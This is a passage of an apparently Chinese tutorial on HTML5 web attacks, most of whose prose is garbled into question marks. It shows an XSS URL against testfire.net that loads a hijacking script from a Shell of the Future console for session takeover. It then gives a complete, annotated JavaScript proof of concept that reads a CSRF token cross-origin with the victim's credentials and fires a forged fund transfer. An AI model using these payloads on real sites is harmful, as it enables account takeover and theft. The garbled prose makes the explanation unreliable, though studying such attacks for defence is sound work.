????3??????????????http://127.0.0.1:8008/sotf.console (firefoxЧ????)
????4??????????????????????檔??Shell of the Future??????JavaScript??exp- e1.js??e2.js?????????????XSS???????????????????????

 ??

????5??????????????????????????
????http://www.testfire.net/bank/login.aspx (admin/admin)
????????????????????????XSS?????http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E
????6???????????????????????????????£?
????http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E
????7????????????????????IP??????????????????????“Hijack Session”??

????8?????Hijack Session???????????????棺

???????????CSRF?????token??
?????????????????????token??????CSRF??????????????HTML5???????????????????п????????CSRF??token?????CSRF token??????URL(GET????)?????????????CORSЭ?飬???????????????CSRF payload??????????????????????????????????????????HTTP ????“origin”??????????????????withCredentials?true??????????????????????
????1?????????www.bank.com??
????2????????????CSRF????????????????????????????token???????GET????????????????????£?
    <input type="hidden" id="test" name="csrfToken" value="12345678" />
???????????£?
????http://www.bank.com/Confirmation.jsp?value=200&csrfToken=1234234523
????3???????????email??IM????????????????????????????ww.attackersite.com
????4????????????????Ajax????www.bank.com????????Щ????????????????CSRF??token???
????5???????????????????token???????????CSRF??????
????6?????????д?????????δ???????Ajax????ConfirmTransfer.jsp??沢????????????????????????????csrfToken??????????????Ajax????????????а?????CSRF token??

 

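<!DOCTYPE html>
<html>
<head>
<script>
// Proof-of-concept from the write-up: read a CSRF token out of a page the
// target serves on GET, then replay it in a forged transfer request.
//
// A cross-origin read of responseText only succeeds when the target answers
// with CORS headers that admit THIS page's origin *with credentials*:
//   Access-Control-Allow-Origin: <this page's origin>
//     (a literal "*" is rejected by browsers once withCredentials is set)
//   Access-Control-Allow-Credentials: true
// Without both headers the browser blocks the read and the attack stops at
// the first request.
//
// The ActiveXObject("Microsoft.XMLHTTP") fallback of the original was
// dropped: that legacy object has no CORS support, so the cross-origin read
// this PoC depends on could never succeed through it.

// Extract the csrfToken value from the fetched page.
// Matches the hidden input shown in the write-up (name="csrfToken" value="...")
// instead of the original's fixed offsets (n+18 .. n+28), which silently
// returned garbage whenever the token was not exactly 10 characters or the
// markup differed. Assumes `name` precedes `value` on the element, as in
// the write-up's markup. Returns null when no token is present.
function extractCsrfToken(html) {
  var m = /name=["']csrfToken["'][^>]*?value=["']([^"']*)["']/.exec(html);
  return m ? m[1] : null;
}

// Build the forged transfer URL.
// The original embedded "&amp;" inside the script text; script content is
// raw text, so the entity is never decoded and the parameter names would
// have reached the server as "amp;Account" / "amp;csrfToken". Plain "&" is
// what the server actually expects. encodeURIComponent replaces the legacy
// escape(), which leaves "+", "/" and "@" unencoded.
function forgedTransferUrl(token) {
  return "http://bank/Myapp/TransferFund.jsp?datum1%2F=06-06-2013&Account=1234&csrfToken=" +
    encodeURIComponent(token);
}

// Entry point (called from body onload): fetch the token-bearing page with
// the victim's credentials, then fire the forged request.
function testing() {
  var fetchToken = new XMLHttpRequest();
  // Send the victim's bank cookies with the cross-origin request. The
  // original omitted this, so the bank would have seen an anonymous request
  // and the response would have carried no session-bound token.
  fetchToken.withCredentials = true;
  // Asynchronous instead of the original synchronous call: the result is
  // handled in onload, which also keeps the UI thread unblocked.
  fetchToken.open("GET", "http://bank/Myapp/ConfirmTransfer.jsp", true);
  fetchToken.onload = function () {
    if (fetchToken.status !== 200) {
      return;
    }
    var token = extractCsrfToken(fetchToken.responseText);
    if (token === null) {
      // No token in the page (or the CORS read was blocked); nothing to replay.
      return;
    }
    var transfer = new XMLHttpRequest();
    transfer.withCredentials = true;
    transfer.open("GET", forgedTransferUrl(token), true);
    transfer.send();
  };
  fetchToken.send();
}
</script>
</head>
<body onload="testing();">
</body>
</html>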

???????????в???????????У???????????飬??????HTML5?У??????????????????CSRF TOKEN??????Щ??????